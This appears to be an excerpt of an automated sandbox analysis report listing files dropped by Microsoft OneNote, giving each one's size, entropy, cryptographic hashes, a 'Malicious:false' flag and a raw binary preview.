                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                              MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                              SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                              SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                                                                                              SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):5.313488404618078
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gO8AWligq7YbZ1LbstwhyZGD20L5RSFoGSXgDbR0lw/SkxZ8EaSDrRF:aNPPWtMM3D
                                                                                                                                                                                                              MD5:E0ED496917C427B241E471C3852B9638
                                                                                                                                                                                                              SHA1:228278B852E0822B5F771FE270FEB86CF3F6C053
                                                                                                                                                                                                              SHA-256:E9F6F8DCB10B39263D00F9D85AFB616B79A9B8BF1C0880A00A6F1F4922AB6DD2
                                                                                                                                                                                                              SHA-512:2B730D2BF756CA7A732559606171931823C655CECF8611A49E0DB7401A8BFA22891DEC10384F8F80CE54BE52D3C408D293A6720F2230728B8B9F4CF7BE6E1A79
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:x.......(...........@...0@... .. L......x...................\...`J... ...J..............................................................................x........................J... ..@K...............}.......}.....G....q4...................i.........,.8.\%..........P.......CT:.]....w..w...,*AT%.5.w.......................................................................}.T.........k.....X.K...............................f...................0...........e....4.........................Ap.H..@.AFJy.k.....(.....x.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .O.r.a.n.g.e...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...2...0.0.0.2.4...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e.......#.............i................6I.D.......2...........`...f.......6........}......ww..(t..'Q.... .a.7...............0...........e....4.........................A..:4E.2..p1......(...`.i.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .Y.e.l.l.o.w...j...P.a.g.e.L.o.c.I.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.097540548144835
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:b0sQMgaj0NAtbtQEau87XHnO9Ha1hv7TolrdHrudI40dX9A8IXFWPes8IK36S:Qs30NAPQEau6XHO9Ev7TIRLuJ00v
                                                                                                                                                                                                              MD5:CFB59791792605536D8662E2B6BF70EA
                                                                                                                                                                                                              SHA1:3235B61AF6783CD2EA7A91F738C86177ADE8A560
                                                                                                                                                                                                              SHA-256:9A4752E696341253A33D8594065E4D638694758179776A6CA304F4E1E3196671
                                                                                                                                                                                                              SHA-512:94472FE91180C19784477C53FAF718DA3C073FE2E484BDA2F1947823326F764747970A8627AD3D50373549725271036ECE07ADE9287EB085F024E8B89775ACB7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....... ...v....................................................?....?.............................................................................2...>.......|...v...H............................I.......I.qk..B.....LZD.......D..cv...O?..`..D..cv...O?..`..D....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............[?.mT3...."..,....N...^................7>l.P.I...f.Y..........f........................................I.qk..B.....LZ.............[?.mT3...."..,.........[?.mT3...."..,.........D.......D.......D...........................................D..j....D..T.]..D.......D....B..D..H....D....B..D....>.)D....J...................;........4...4...4.."..............D...D...D....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........D.......D......#D..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.096913784771266
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:9s3PWsAdEEAXgd9KsTGRyQeDq/D0DLyyM:9s3PWsKRAX09KsaRyQeDoD0DGyM
                                                                                                                                                                                                              MD5:98FA48A6AE40FA928D250663F42DE56C
                                                                                                                                                                                                              SHA1:3EE92DDF24B4A2332A8CBD7CB1131C1046872368
                                                                                                                                                                                                              SHA-256:D18004A609AB97D5607900CC9A510AD898744C6A2072FFA04B4A37E4E04C7D34
                                                                                                                                                                                                              SHA-512:D39D821375B186148133BE61C16CAD387F18910CF13E9B4D2C3A8CC4B351080C6530AC3EB48325B6BCDD3C0DDFD14F2B6B307DAD67D74CFD7B27BCBCB6318FC4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ..[.......[.J...9h...v@..[.J...9h...v@..[..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................~u...o;.......N...^....................MH....=r.@........f........................................I.qk..B.....LZ................~u...o;...............~u...o;..............[.......[.......[...........................................[j......[T.]....[.......[..B....[H......[..B....[..>.)..[..J...................;........4...4...4.."................[...[...[..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........[.......[....#..[............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.067311940385233
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:lsETwUisKptebgE3p58XL89Q6CATovrd6rZhI0dXITbK4Ag:lsytKpbE38XI9Q6CATqRiZ1SA
                                                                                                                                                                                                              MD5:78F06737E46EF47C689105450D544D4F
                                                                                                                                                                                                              SHA1:81189E9CF59E7DAD97EF68B77ABA8DDE95AC5C15
                                                                                                                                                                                                              SHA-256:C705B1DFB8A99EA2C7F7825EA750775F9CC74BB25E9A999D567DA8F0CF966E49
                                                                                                                                                                                                              SHA-512:8D9692EC1830B032C2CE5A7C422B039BB454E31349498D7F5A0628C040B7463AE61BF3E99247935608B6A3015C35FA0D11F3D08DA61CEE55F1411DCC74E5C39D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ............e...=.$.(.......e...=.$.(........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................B.F...J./J.......N...^...............I......F..{.\(EG........f........................................I.qk..B.....LZ...............B.F...J./J..............B.F...J./J...........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.045779158577508
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:TxPstc3iwsMZtw0El2QXjQ9SaGSToxTrdnrE/IGdX6zWeBBSg:pstpwsMZjEcQXjQ9SaGST0RrosBY
                                                                                                                                                                                                              MD5:3C36EEBE9A13C8F0B8A3DB1B7ED74D15
                                                                                                                                                                                                              SHA1:2B8FE8AC754311EE5C0CFCA23780E0084971F58C
                                                                                                                                                                                                              SHA-256:1D8B6B0A46C2C4B465914657723851A3A5AFDE74F3928A310769671A54FA9005
                                                                                                                                                                                                              SHA-512:854A745B855572252935A505EC74300B2113DF0F37BF55024C6A15B0002EB2DB5C055EC883872EF5A89634953FD0841F8AFB0D2C26B3E7ADF4AB9860621BFF40
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZz.......z...j.R.&.9....z...j.R.&.9....z....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............4`........:.um....N...^.................-^..M.b...\?.........f........................................I.qk..B.....LZ..............4`........:.um..........4`........:.um.........z.......z.......z...........................................z..j....z..T.]..z.......z...B..z..H....z....B..z....>.)z....J...................;........4...4...4.."..............z...z...z....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........z.......z......#z..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.0873755583097
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:N7srUf+ZtbEHKX7U9AF17jTrRysnmfFa6fCVIRb:9srU2ZGHKXI9g1H3RyqmfFa6f4IR
                                                                                                                                                                                                              MD5:AA4974001C59F4B24FB16296594B303B
                                                                                                                                                                                                              SHA1:E3F9BF69487D764FA360227BC8E0E7EB6FEABCDF
                                                                                                                                                                                                              SHA-256:27BD55A2D5660852D877D64066162529A6858B2B81337F13359E3C953BB9BA57
                                                                                                                                                                                                              SHA-512:73C17CD03161D8CF79F5B9C6DA2D6ABE4EB19418BFD1FF738677EE3F4DBFEFD4D0C126F6DCA7747C93F4D92DF39431A5DAEE43CC51436F69B1C52190E855732B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ..Q.......Q_....5.y..X.d..Q_....5.y..X.d..Q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............;DI.....<#.b.x.n....N...^...............E1!2.1.J...............f........................................I.qk..B.....LZ............;DI.....<#.b.x.n........;DI.....<#.b.x.n...........Q.......Q.......Q...........................................Qj......QT.]....Q.......Q..B....QH......Q..B....Q..>.)..Q..J...................;........4...4...4.."................Q...Q...Q..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........Q.......Q....#..Q............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.031390603368818
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Ym2s6VNknX+tqKEEDX09TxThToQrdDr6IddXz9RIOR:z2s1nuTEaX09TNhTFRPp5
                                                                                                                                                                                                              MD5:70965B310E5A0939246501A791892446
                                                                                                                                                                                                              SHA1:50FD4FB24E9FF192FD11E88FC36FC03AB8CDF66B
                                                                                                                                                                                                              SHA-256:833A7A76B72D6FF7FBD4397F4203A47AD39AF6CCB853DAE7B4C5B720C7248689
                                                                                                                                                                                                              SHA-512:57FDE867378A06D426EBBA04B24B891CB8C2DF834251646B4632A617A8E5C83B7D0CCD8D7E0A5D2DA2414A2072A1A52904395CA1D3C418BF9C9711DBAB81D544
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ..e.......eb.se..&...r.L..eb.se..&...r.L..e..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............!..;...-U9.........N...^...................= !O....*..^........f........................................I.qk..B.....LZ.............!..;...-U9..............!..;...-U9................e.......e.......e...........................................ej......eT.]....e.......e..B....eH......e..B....e..>.)..e..J...................;........4...4...4.."................e...e...e..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........e.......e....#..e............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.079367353466974
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:1HQsC7b4HkOMzEYTXk99AT+R2HkwzrzqXztzEzrCBzOz:1HQstkOzYTXk99AyR2HkwnyZ4nCy
                                                                                                                                                                                                              MD5:61A04A3AF2035B6E6D820C2AD33F83A0
                                                                                                                                                                                                              SHA1:72178E0EC38F583EA4380155B307B1DB402F5B2E
                                                                                                                                                                                                              SHA-256:115BFE2901CC4C217ADE2200A8B77234CBAA9B22F36CFB3832D3984D61277E81
                                                                                                                                                                                                              SHA-512:3E3C2E6E7F562E47F14889C9A16D4B6064DC241F37A2FE2DBDBD98F5D853AE98CF383153E4341B3B50AA8171A40A248BAC65F9F0B2EEDB4151616A72A0BFB347
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ,x......,x......8g..m.,x......8g..m.,x...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............l..`Rh...:..2.....N...^...............g_2.^..N.wJ............f........................................I.qk..B.....LZ.............l..`Rh...:..2..........l..`Rh...:..2..........,x......,x......,x..........................................,x.j....,x.T.]..,x......,x...B..,x.H....,x...B..,x...>.),x...J...................;........4...4...4.."..............,x..,x..,x...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........,x......,x.....#,x.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.113495174180385
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YMyslZnVTAz6ltlAL6En6rVX49J7AKToRCrdvlxroID5DdXv1RdRh:SsFAz+XAeEgX49J7hTNRHd5Dl
                                                                                                                                                                                                              MD5:6490B5C6D692CFBCBD11A3F382F19AD1
                                                                                                                                                                                                              SHA1:5322FA1E80166883845FF9D7AEB0F082D9767ABB
                                                                                                                                                                                                              SHA-256:6876C64F06852696E5899972713DBB578E04D911AAFF854FE69A449AB63217E7
                                                                                                                                                                                                              SHA-512:483BCD9F39B51B7499B5DA896CB89D61673290F9C7DC4267EFD0E0C89EA1D7DECAD29FC73E595F8F26B3C6374BCD9F19F4838879B3C06911C1112482EB61241F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ............../.:w.E"........./.:w.E"........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............#..3..6...=T.....N...^...............+h.....D.Z.....g........f........................................I.qk..B.....LZ.............#..3..6...=T..........#..3..6...=T.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.079362547805339
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YKwsM5Dq95Yx5pcwXHt9H4l1KEXgZUX49XpxToUrdPrBI9dXDJRM5Yx5/5Tdk5HG:KskXHf4lcEXgqX495xTBRjAz3p
                                                                                                                                                                                                              MD5:FD4FD279D8C0FB0874E40FA59BC7F45E
                                                                                                                                                                                                              SHA1:4409F7EA454561324A5F076B4D1222DE7A609DFC
                                                                                                                                                                                                              SHA-256:A11750072EB6D3D6F754DFAA274B35EDF6D9099804FE1290361C4831BA2E4EAA
                                                                                                                                                                                                              SHA-512:ADA6A15D9C60A6FCF497529B5DAED0FEAAAF7C46C3E65B5E99A821D6B1D7414447D0F633A83077638368BB4C8A9E6CCBE1B9B742AE8CA5C5A8DC734B0FBDBB97
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.B.......B....9......$4>.B....9......$4>.B...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............i......'.1CZ.......N...^...............+L.F..7O..0...........f........................................I.qk..B.....LZ............i......'.1CZ...........i......'.1CZ.............B.......B.......B...........................................B.j.....B.T.]...B.......B...B...B.H.....B...B...B...>.).B...J...................;........4...4...4.."...............B...B...B...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........B.......B.....#.B.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.0663479467954975
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YnBs97+TKubnui/SfteiE8HWXAQW9t3JFDTourdQrWIfdXRBRBu/z3Zr97Sll:ys9cnui/Sf3EXXAh9FDTPRI3GK
                                                                                                                                                                                                              MD5:0BD5F6A9C24A40252A7FA98CBF9DBF51
                                                                                                                                                                                                              SHA1:B396239FE6E478633409802D1D94F1984B09DC3C
                                                                                                                                                                                                              SHA-256:3318A07553FBB332BFC60588D2F933EDCCEED5BCA30BF4398EFBF47D44FF7305
                                                                                                                                                                                                              SHA-512:5D557C5F060EB0BE6A55D3FEB25C0C43E77CDE1394D264AC40A61B0BD8D2ED4664155759FE704C309F6D2960F17F7394842B267890E7E6D2BBDEC0DF9E44FB46
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ................ ..%...=........ ..%...=.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............7.U..<#...l.....N...^................(..m,Y@.*J...K.........f........................................I.qk..B.....LZ..............7.U..<#...l...........7.U..<#...l.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.050222056113385
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Yu+s/LOx5DRO+tNMyELh9JXA9FOgnTosxrdP7rUIbdXptRTRlt:is6RO+rEfJXA9RnTbRf9T
                                                                                                                                                                                                              MD5:1324C09667FFD81E169B646897883DC3
                                                                                                                                                                                                              SHA1:F11FBE8EA96809E4670DE044D4B72C3F005232E3
                                                                                                                                                                                                              SHA-256:D4AC596F5867E0579A8E5781721A1FA2EBCD3E7D6BEDA42A0AF084FE21EC1C49
                                                                                                                                                                                                              SHA-512:C9884655B9F5B73CF02467863B25DB32218D4BAA847D0D6C03516C54BE373CCACE1D8CAE6E5C773FA80247508E8F845BB9B7949759769BA0EABAA08B6FD65846
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.2g......2gW..V.5...'|.I.2gW..V.5...'|.I.2g..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............go#].....J?...>.....N...^.....................YK...w.;F.........f........................................I.qk..B.....LZ............go#].....J?...>.........go#].....J?...>...........2g......2g......2g..........................................2gj.....2gT.]...2g......2g..B...2gH.....2g..B...2g..>.).2g..J...................;........4...4...4.."...............2g..2g..2g..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........2g......2g....#.2g............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.065386888392586
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:uslgyg6g2rW/EF/cXPc9PHBRTVReDPg6gkegPg9gz:uslgyg6g2rRNcXPc9/BRpReDPg6gkegN
                                                                                                                                                                                                              MD5:F5BCA56A74082ADA3AD4E12DE3210C86
                                                                                                                                                                                                              SHA1:2CDDDF965F48E7B07E4A7F04800A09355047A8AC
                                                                                                                                                                                                              SHA-256:27B3D8EE0A95FE65DD60878FEA812623E59082605D8EC25036E01E8535AF2920
                                                                                                                                                                                                              SHA-512:8B62E9190DC72E27130ED205662D27B64AA4ABC8E5C9FFD701615A619CEB857CD9BA7E2786F94A93F2D08B05584C5B0FD393568BC0FC50DBD6999B773DDB6CA6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ9.......9...p.......?5.9...p.......?5.9....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............#.y.W...?..(&.ba....N...^.................<).b L.T.............f........................................I.qk..B.....LZ............#.y.W...?..(&.ba........#.y.W...?..(&.ba.........9.......9.......9...........................................9..j....9..T.]..9.......9...B..9..H....9....B..9....>.)9....J...................;........4...4...4.."..............9...9...9....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........9.......9......#9..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.088897307366094
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Bsm/9Pz9WlFiEHX09erT/RfH72FAD96vyGlj8:Bsm/9Pz9sFPHX09erDRv72F096vycY
                                                                                                                                                                                                              MD5:9C52D1E644E4A5166D0EA4561C51CD74
                                                                                                                                                                                                              SHA1:86A782AE9F4507C55B46CEE066E2F92D40EF2B16
                                                                                                                                                                                                              SHA-256:C673C7583BFD818CBF72E34DB3CC6061427F8255216F2640EAB982D8A92B7D5B
                                                                                                                                                                                                              SHA-512:2B0781DC568CA1B3DDF0E57C2C06EE138ECECD04A4B5FAADABA9F47170D86E4EFD9C247FD172CEE72A32A32D81D246AD2E827AE2469D261DEC08FAA6CF448688
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ............H=..t...Xi.....H=..t...Xi......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'....................|F...>w....N...^....................M.B.=.]..T.........f........................................I.qk..B.....LZ...................|F...>w...............|F...>w........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.0937618481190245
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:lsPNffsIvlddLMEZX09uj2TN6RpS4gGfM5ky61E:lsBsMdLpZX09uj2J6RpS4b6
                                                                                                                                                                                                              MD5:6B887838BD51F33A9D365B7BDB988C5A
                                                                                                                                                                                                              SHA1:23395547E86CD0A0B34AF324959ABE9AD8573A78
                                                                                                                                                                                                              SHA-256:C5C7941A519C5509DF99CA347FFE12796B932781B8E1D3EE278220E7F680A4C8
                                                                                                                                                                                                              SHA-512:3345375F8E61DF4C3A982416754DA2C64549F6EBBF0E1DC43A4850FFEA4CA7711C1220984AEE6F64ED4CA574D504CDB084D69BFD482FCEB99CC215E959A6AC76
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ..$.......$.k.M.....`..$.k.M.....`..$..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............7..,).5q.6...l....N...^.................(...*A..L..,j.........f........................................I.qk..B.....LZ.............7..,).5q.6...l.........7..,).5q.6...l...........$.......$.......$...........................................$j......$T.]....$.......$..B....$H......$..B....$..>.)..$..J...................;........4...4...4.."................$...$...$..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........$.......$....#..$............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.051948022741657
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Iw53s84QvUuGPzmtBFa8t78EdDXQ9gwUZTo8rddrPINdX7T4lkVPZ1p4A0Lta:Iw53sX4GPzmpaO78E5XQ9yZTRRRGgKM
                                                                                                                                                                                                              MD5:3DD8E91B7A1AC36572101938DC20947F
                                                                                                                                                                                                              SHA1:102776EBFB479EA2E77955A06737D5B86AF9BEEE
                                                                                                                                                                                                              SHA-256:75E78DC74557080A35AB23CBBBDE65B2D10A41687EC0379EA009EE676DD166A3
                                                                                                                                                                                                              SHA-512:9FE2BB87C27B1F8D1EA6BFE28620640FB268DCC34F8282A25E941E085F91CA20CD06557BA4838DF3D02275D7BEB1233918C8F3838EEB8E452A9C4CA8224AADE2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ.Z0......Z0..........g..Z0..........g..Z0..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............4x{.o.5....lY.....N...^................H.R.K.BJ...Bo........f........................................I.qk..B.....LZ.............4x{.o.5....lY..........4x{.o.5....lY...........Z0......Z0......Z0..........................................Z0j.....Z0T.]...Z0......Z0..B...Z0H.....Z0..B...Z0..>.).Z0..J...................;........4...4...4.."...............Z0..Z0..Z0..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........Z0......Z0....#.Z0............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.146317868517969
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:msX6jMR06E93gXhx3g9piTARvORPdrf4:msXQMRMSXhG9piMRvO
                                                                                                                                                                                                              MD5:DFC466A6F2E20EC9C8D0875144E5AB2A
                                                                                                                                                                                                              SHA1:C253818A3A2A02BC65882A8CB03961342946C791
                                                                                                                                                                                                              SHA-256:378E722D767DF0F84126B6C2DEC1D62D40AE39275EEB833FD3586F0BF1C8B280
                                                                                                                                                                                                              SHA-512:E89C89ECF0BDD8639125E3B544E8101C46AB25E22B84F4CD4DA905FD1AAFE32AC89EB9452DFBB6F04DFF1662387E5C1EFC4ED383F6FE3D2ED559AE8F3B1D9892
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZRT>.....RT>....6aK..L.2RT>....6aK..L.2RT>..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............fM^..4..0+.}s..`....N...^................v...;.A......K........f........................................I.qk..B.....LZ............fM^..4..0+.}s..`........fM^..4..0+.}s..`.........RT>.....RT>.....RT>.........................................RT>j....RT>T.]..RT>.....RT>..B..RT>H....RT>..B..RT>..>.)RT>..J...................;........4...4...4.."..............RT>.RT>.RT>..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........RT>.....RT>....#RT>............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
